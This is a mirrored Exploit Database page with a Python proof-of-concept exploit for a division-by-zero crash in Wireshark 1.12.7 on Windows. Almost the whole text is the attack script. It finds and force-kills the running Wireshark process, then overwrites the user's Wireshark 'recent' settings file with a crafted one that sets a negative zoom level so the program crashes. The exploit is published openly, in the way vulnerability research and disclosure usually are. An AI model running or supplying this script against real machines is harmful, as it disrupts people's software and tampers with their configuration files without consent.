Wireshark 1.12.7 – Division by Zero Crash (PoC)

• Exploit Database
• 104 阅读

• 作者： spyk
  日期： 2015-09-18
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38240/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138

  # Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC # Date: 02/09/2015 # Exploit Author: spyk <spyk[dot]developpeur[at]gmail[dot]com> @SwanBeaujard # Vendor Homepage: https://www.wireshark.org/ # Software Link: https://www.wireshark.org/download.html # Version: 1.12.7 # Tested on: Windows 7 # Thanks to my professor @St0rn https://www.exploit-db.com/author/?a=8143   import os import subprocess import getpass   drive=os.getenv("systemdrive") user=getpass.getuser() path="%s\\Users\\%s\\AppData\\Roaming\\Wireshark\\recent" %(drive,user) def wiresharkIsPresent(): ps=subprocess.check_output("tasklist") if "Wireshark.exe" in ps: return 1 else: return 0 def killWireshark(): try: res=subprocess.check_output("taskkill /F /IM Wireshark.exe /T") return 1 except: return 0 if wiresharkIsPresent(): if killWireshark(): print "Wireshark is killed!" sploit=""" # Recent settings file for Wireshark 1.12.7. # # This file is regenerated each time Wireshark is quit # and when changing configuration profile. # So be careful, if you want to make manual changes here. # Main Toolbar show (hide). # TRUE or FALSE (case-insensitive). gui.toolbar_main_show: TRUE # Filter Toolbar show (hide). # TRUE or FALSE (case-insensitive). gui.filter_toolbar_show: TRUE # Wireless Settings Toolbar show (hide). # TRUE or FALSE (case-insensitive). gui.wireless_toolbar_show: FALSE # Show (hide) old AirPcap driver warning dialog box. # TRUE or FALSE (case-insensitive). gui.airpcap_driver_check_show: TRUE # Packet list show (hide). # TRUE or FALSE (case-insensitive). gui.packet_list_show: TRUE # Tree view show (hide). # TRUE or FALSE (case-insensitive). gui.tree_view_show: TRUE # Byte view show (hide). # TRUE or FALSE (case-insensitive). gui.byte_view_show: TRUE # Statusbar show (hide). # TRUE or FALSE (case-insensitive). gui.statusbar_show: TRUE # Packet list colorize (hide). # TRUE or FALSE (case-insensitive). gui.packet_list_colorize: TRUE # Timestamp display format. # One of: RELATIVE, ABSOLUTE, ABSOLUTE_WITH_DATE, DELTA, DELTA_DIS, EPOCH, UTC, UTC_WITH_DATE gui.time_format: RELATIVE # Timestamp display precision. # One of: AUTO, SEC, DSEC, CSEC, MSEC, USEC, NSEC gui.time_precision: AUTO # Seconds display format. # One of: SECONDS, HOUR_MIN_SEC gui.seconds_format: SECONDS # Zoom level. # A decimal number. gui.zoom_level: -10 # Bytes view. # A decimal number. gui.bytes_view: 0 # Main window upper (or leftmost) pane size. # Decimal number. gui.geometry_main_upper_pane: 440 # Main window middle pane size. # Decimal number. gui.geometry_main_lower_pane: 428 # Packet list column pixel widths. # Each pair of strings consists of a column format and its pixel width. column.width: %m, 59, %t, 84, %s, 154, %d, 154, %p, 56, %L, 48, %i, 1285 # Last directory navigated to in File Open dialog. gui.fileopen_remembered_dir: """+drive+"""\\Users\\"""+user+"""\\Documents\\ """ try: f=open(path,"w") f.write(sploit) f.close() print "Success!" except: print "Fail :("